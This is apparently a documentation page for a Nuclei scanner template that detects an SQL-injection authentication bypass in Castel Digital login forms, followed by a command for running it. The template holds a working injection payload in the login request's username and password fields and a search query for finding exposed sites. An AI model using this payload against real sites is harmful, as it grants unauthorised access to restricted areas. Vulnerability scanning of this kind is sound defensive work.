Skip to content

Castel Digital - Authentication Bypass

ID: castel-digital-sqli

Severity: high

Author: s4e-io

Tags: sqli,auth-bypass,castel

SQL Injection vulnerability in Castel Digital login forms.

id: castel-digital-sqli
info:
name: Castel Digital - Authentication Bypass
author: s4e-io
severity: high
description: |
SQL Injection vulnerability in Castel Digital login forms.
reference:
- https://www.casteldigital.com.br/
- https://cxsecurity.com/issue/WLB-2024050032
metadata:
verified: true
max-request: 2
google-query: "Castel Digital"
tags: sqli,auth-bypass,castel
http:
- raw:
- |
POST /restrito/login/sub/ HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
username=x%27%3D%27x%27or%27x&password=x%27%3D%27x%27or%27x
- |
GET /restrito/ HTTP/1.1
Host: {{Hostname}}
matchers-condition: and
matchers:
- type: word
part: body_2
words:
- "Banner"
- "Construtoras"
condition: and
- type: status
status:
- 200
# digest: 4a0a00473045022100c3bed844e2e499430568a9e64ae03fde8b05b55d27cf2a37cb16fe0b977b0d7002205b43bc9fdc0255fec38a90579dd9849a50b990d4254ff1fe1917dd3e83afec8f:922c64590222798bb761d5b6d8e72950

This template is used to detect vulnerabilities in web applications. It can be used with the Nuclei tool to scan for specific patterns or behaviors.

Terminal window
$ nuclei -u "URL" -t "http/vulnerabilities/other/castel-digital-sqli.yaml"

View on Github